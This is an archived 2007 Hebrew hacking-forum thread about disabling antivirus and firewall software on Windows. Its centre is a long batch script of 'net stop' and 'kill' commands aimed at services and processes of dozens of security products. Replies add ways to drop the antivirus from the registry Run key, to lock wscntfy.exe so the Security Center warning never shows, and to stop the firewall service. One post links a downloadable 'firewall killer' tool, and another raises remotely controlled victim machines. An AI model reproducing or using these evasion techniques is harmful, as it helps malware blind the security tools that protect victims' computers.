Logo

רד-בורד: ארכיון

ראשי > אבטחת מידע > הריסת ה av

04/03/2007 13:39:47 xtr
אנשים איך אפשר להרוס ת av חשבתי על שיטה נחמדה לפתוח אותו לקריאה בניארית ואז אי אפשר לפתוח אותו שוב אבל זה טוב רק עם התוכנה שלי רצה לפני האנטי וירוס וזה לא יקרה בפועל :L

אז איך אפשר עוד :| ?
04/03/2007 13:54:16 V[i]RuS
להריץ קובץ הצוואה..
04/03/2007 13:56:19 xtr
שמה עושה :\ ?
04/03/2007 13:58:59 V[i]RuS
מוחק\סוגר תהליכים..
04/03/2007 14:25:42 xtr
יש לך קובץ כזה מוכן שסוגר את כל התהלכים של האנטי וירוסים המוכרים ?

אתה בטוח שאפשר בכלל לסגור תהליך של אנטי וירוס

כי אם אני לא טועה אי אפשר לסגור ...
04/03/2007 14:45:52 xtr
קוד:
net stop ACKWIN32
net stop ADVXDWIN
net stop ALERTSVC
net stop ALOGSERV
net stop AMON9X
net stop ANTI-TROJAN
net stop ANTS
net stop apvxdwin
net stop ATCON
net stop ATUPDATER
net stop ATWATCH
net stop AUTODOWN
net stop AutoTrace
net stop AVCONSOL
net stop AVGCC32
net stop AVGCTRL
net stop Avgctrl
net stop AVGSERV
net stop AvgServ
net stop AVGSERV9
net stop AVGW
net stop avkpop
net stop AVKSERV
net stop avkservice
net stop avkwctl9
net stop AVP32
net stop AVP32
net stop AVPCC
net stop AVPCC
net stop AVPM
net stop AVPM
net stop Avsched32
net stop AVSYNMGR
net stop AvSynMgr
net stop AVWINNT
net stop AVXMONITOR9X
net stop AVXMONITORNT
net stop AVXQUAR
net stop AVXW
net stop BLACKD
net stop BLACKICE
net stop BlackICE
net stop CLAW95
net stop CLAW95CF
net stop CLEANER
net stop CLEANER3
net stop CMGRDIAN
net stop CONNECTIONMONITOR
net stop defscangui
net stop DEFWATCH
net stop DOORS
net stop DVP95
net stop EFPEADM
net stop ETRUSTCIPE
net stop EVPN
net stop EXPERT
net stop fameh32
net stop fch32
net stop fih32
net stop fnrb32
net stop fsaa
net stop fsav32
net stop fsgk32
net stop fsm32
net stop fsma32
net stop fsmb32
net stop gbmenu
net stop GENERICS
net stop GUARD
net stop GUARDDOG
net stop HELP
net stop IAMAPP
net stop IAMSERV
net stop ICLOAD95
net stop ICLOADNT
net stop ICMON
net stop ICSUPP95
net stop ICSUPPNT
net stop IFACE
net stop IOMON98
net stop ISRV95
net stop JEDI
net stop LDNETMON
net stop LDPROMENU
net stop LDSCAN
net stop LOCKDOWN
net stop LOCKDOWN2000
net stop LUALL
net stop LUCOMSERVER
net stop MCAGENT
net stop MCMNHDLR
net stop MCSHIELD
net stop McShield
net stop MCTOOL
net stop MCUPDATE
net stop MCVSRTE
net stop MCVSSHLD
net stop MGAVRTCL
net stop MGAVRTE
net stop MGHTML
net stop minilog
net stop MONITOR
net stop MOOLIVE
net stop MWATCH
net stop NAVAP
net stop navapsvc
net stop NAVAPW32
net stop NAVENG
net stop NAVEX15
net stop NAVLU32
net stop NAVW32
net stop NAVWNT
net stop NDD32
net stop NeoWatchLog
net stop NETUTILS
net stop ngdbserv
net stop NGServer
net stop NISSERV
net stop NISSERV
net stop NISUM
net stop NISUM
net stop NMAIN
net stop NORMIST
net stop NPROTECT
net stop NPSSVC
net stop NSCHED32
net stop ntrtscan
net stop NTVDM
net stop NTXconfig
net stop NVC95
net stop NVSVC32
net stop NWService
net stop NWTOOL16
net stop PADMIN
net stop pavproxy
net stop PCCIOMON
net stop pccntmon
net stop pccwin97
net stop PCCWIN98
net stop pcscan
net stop PERSFW
net stop POP3TRAP
net stop POPROXY
net stop PORTMONITOR
net stop PROCESSMONITOR
net stop PROGRAMAUDITOR
net stop PROT95
net stop PVIEW95
net stop RAV7
net stop RAV7WIN
net stop REALMON
net stop RESCUE
net stop RTVSCN95
net stop sbserv
net stop SCAN32
net stop SCRSCAN
net stop sharedaccess
net stop SPHINX
net stop SPYXX
net stop SS3EDIT
net stop STOPW
net stop SVW3
net stop SWEEP95
net stop SweepNet
net stop SWEEPSRV
net stop SWEEPSRV.SYS
net stop SweepUpdate
net stop SWNETSUP
net stop SymProxySvc
net stop SYMTRAY
net stop TFAK
net stop vbcmserv
net stop VbCons
net stop VET32
net stop VET95
net stop VETTRAY
net stop VPC32
net stop VPTRAY
net stop VSCHED
net stop VSECOMR
net stop VSHWIN32
net stop VSMAIN
net stop vsmon
net stop VSMON
net stop VSSTAT
net stop WATCHDOG
net stop WEBSCANX
net stop WGFE95
net stop WIMMUN32
net stop WRADMIN
net stop WRCTRL
net stop ZAPROMINILOG
net stop ZONEALARM
kill _AVPCC.EXE
kill ALOGSERV.EXE
kill ANTI-TROJAN.EXE
kill ANTS.EXE
kill APVXDWIN.EXE
kill ATro55en.exe
kill ATWATCH.EXE
kill AUTOUPDATE.EXE
kill AVGSERV9.EXE
kill AVPCC.EXE
kill AVPM.EXE
kill bd_professeional.exe
kill bidef.exe
kill bidserver.exe
kill BIPCP.exe
kill bipcpevalsetup.exe
kill bisp.exe
kill bs120.exe
kill CDP.EXE
kill CLEANER.EXE
kill cleaner3.exe
kill CMGRDIAN.EXE
kill cmon016.exe
kill cpf9x206.exe
kill cpfnt206.exe
kill cwnb181.exe
kill cwntdemo.exe
kill deputy.exe
kill dpfsetup.exe
kill DRWATSON.EXE
kill drweb32.exe
kill escanh95.exe
kill escanhnt.exe
kill escanhnt.exe
kill escanv95.exe
kill EZAntivirus-CNET.exe
kill FAST.EXE
kill firewall.exe
kill fp-win_trial.exe
kill fsav530stbyb.exe
kill fsav530wtbyb.exe
kill fsav95.exe
kill GBMENU.EXE
kill GBPOLL.EXE
kill GUARDDOG.EXE
kill hacktracersetup.exe
kill hwpe.exe
kill IAMAPP.EXE
kill IAMSERV.EXE
kill iparmor.exe
kill jammer.exe
kill kavlite40eng.exe
kill kavpers40eng.exe
kill kavpers40eng.exe
kill kerio-pf-213-en-win.exe
kill kerio-wrl-421-en-win.exe
kill kerio-wrp-421-en-win.exe
kill KillProcesssetup161.exe
kill ldpro.exe
kill localnet.exe
kill LOCKDOWN.EXE
kill lockdown2000.exe
kill luau.exe
kill MCSHIELD.EXE
kill mfw2en.exe
kill mfweng3.02d30.exe
kill MINILOG.EXE
kill MOOLIVE.EXE
kill mrflux.exe
kill mu0311ad.exe
kill nav80try.exe
kill NAVAPW32.EXE
kill NAVAPW32.EXE
kill ncinst4.exe
kill NDD32.EXE
kill NetSpyHunter-1.2.exe
kill netzip.exe
kill Norton_Internet_Secu_3.0_407.exe
kill Norton_Internet_Secu_3.0_407.exe
kill NPF40_TW_98_NT_ME_2K.exe
kill NPROTECT.EXE
kill NSCHED32.EXE
kill NTVDM.EXE
kill nwinst4.exe
kill NWTOOL16.EXE
kill nz.cab
kill outpostinstall.exe
kill outpostinstall.exe
kill outpostproinstall.exe
kill PADMIN.EXE
kill panixk.exe
kill PAVPROXY.EXE
kill pcc2002s902.exe
kill pcc2k_76_1436.exe
kill pcc2knt_76_1436.exe
kill pcdsetup.exe
kill pcip10117_0.exe
kill pf2.exe
kill platin.exe
kill POPSCAN.EXE
kill PPINUPDT.EXE
kill PPTBC.EXE
kill PPVSTOP.EXE
kill ProcExplorerv1.0.exe
kill proport.exe
kill pspf.exe
kill purge.exe
kill PVIEW95.EXE
kill qserver.exe
kill rav8win32eng.exe
kill RULAUNCH.EXE
kill SBServ.exe
kill setup_flowprotector_us.exe
kill setupvameeval.exe
kill shellspyinstall.exe
kill shn.exe
kill spf.exe
kill SPYXX.EXE
kill SS3EDIT.EXE
kill st2.exe
kill supftrl.exe
kill supporter5.exe
kill TAUMON.EXE
kill TAUMON.EXE
kill tauscan.exe
kill TC.EXE
kill TCA.EXE
kill TCM.EXE
kill TDS-3.EXE
kill tds-3.exe
kill tfak5.exe
kill titanin.exe
kill titaninxp.exe
kill trjsetup.exe
kill trojantrap3.exe
kill trojantrap3.exe
kill UPDATE.EXE
kill vbcmserv.exe
kill VbCons.exe
kill vbust.exe
kill vbwin9x.exe
kill vbwinntw.exe
kill vcsetup.exe
kill vfsetup.exe
kill vnlan300.exe
kill vnpc3000.exe
kill vpfw30s.exe
kill vpfw30s.exe
kill vscenu6.02d30.exe
kill VSHWIN32.EXE
kill vsisetup.exe
kill VSMON.EXE
kill VSSTAT.EXE
kill vswin9xe.exe
kill vswinntse.exe
kill vswinperse.exe
kill w9x.exe
kill WGFE95.EXE
kill wnt.exe
kill wsbgate.exe
kill xpf202en.exe
kill ZAPLUS.EXE
kill ZAPRO.EXE
kill zapsetup3001.exe
kill ZATUTOR.EXE
kill ZAUINST.EXE
kill zonalm2601.exe
kill ZONEALARM.EXE



מה אתה אומר על זה?

הוא לא הורג תקספרסקי (האנטי וירוס היחיד שבדקתי )
[ההודעה נערכה על-ידי xtr ב-04/03/2007 14:53:51]
04/03/2007 14:49:23 V[i]RuS
חח נחמד =]
כמו כן אתה יכול בעזרת ה REGISTRY למחוק מה STARTUP את האנטיוירוס.
04/03/2007 19:05:18 devil kide
אולי גם לדרוס את הזיכרון שלו.
04/03/2007 21:10:50 xtr
דרך קוד פשוט לאללה סגרתי תפיירול של המחשב (וינדוס למה ציפיתי :\ )

עכשיו איך אני יכול לסגור אנטי וירוס כוס עמק אנלא מצליח :\
05/03/2007 08:18:23 haritzik
עליך להכין קובץ שימחק את הרגג’יסטרי של האנטי וירוס בתוך:
hkey_local_machine>>software>>microsoft>>windows>>currentversion>>run>avast!
(ככה זה בגרסה הכי חדשה של אואסט)
ואז להפעיל מחדש את המחשב והאואסט לא יפעל, הגיוני שהוא יקפיץ אזהרה אך לא יפעל.
דרך אגב, איך סוגרים את הפיירוול??[ההודעה נערכה על-ידי haritzik ב-05/03/2007 09:02:01]
05/03/2007 11:22:09 xtr
אתה פותח תקובץ של המערכת הגנה הזאת (זאת שמקפיצה הודעה כהאנטי וירוס נסגר) לקריאה בינארית

ואז את שולח net stop לתהליך sharedaccess


http://rapidshare.com/files/19492841/fwkillerPk.zip.html

הוא לא מוסיף את עצמו להפעלה מחדש

אז כשמפעילים מחדש תמחשב הוא לא סוגר תתהליך ולא חוסם כלום לכן אין גם הודעה של מרכז האבטחה[ההודעה נערכה על-ידי xtr ב-05/03/2007 11:28:25]
06/03/2007 13:19:25 haritzik
סורי אחי אבל לא הבנתע כלום ממה שכתבת... אני לא מתמצא בנושא הזה...איפה אפשר ללמוד???
חוץ מזה, בקשר לקובץ שהעלית, פתחתי אותו בטעות זה הרס לי את הפיירוול??
06/03/2007 18:22:22 xtr
פתח תמחשב מחדש וזהו הוא יחזור ..

אתה יודע איזו שפת תיכנות ?
06/03/2007 18:27:30 haritzik
כן, c אבל גם זה חלקי...
06/03/2007 18:58:14 xtr
אתה צריך לדעת לעבוד עם קבצים
אתה פותח את הקובץ exe.wscntfy
לעריכה ואז המחשב לא יכול להשתמש בו עד שלא תסגור אותו (אל תסגור)

ואז שהתוכנה תיצור bat

net stop sharedaccess
וזהו עקרונית אתה יכול לסגור את התוכנה האזהרה של sp2 לא תקפוץ...
07/03/2007 07:45:04 haritzik
נחמד....תודה!
09/03/2007 22:56:13 Hypathia
כל השיטות שפורטו קודם לוקות בחוסר יעילות אם אתה מכוון להטריד אנטיוירוס של מחשב שיש לך שליטה עליו מרחוק.

פרט ביתר דיוק את המצב...
עמודים: 1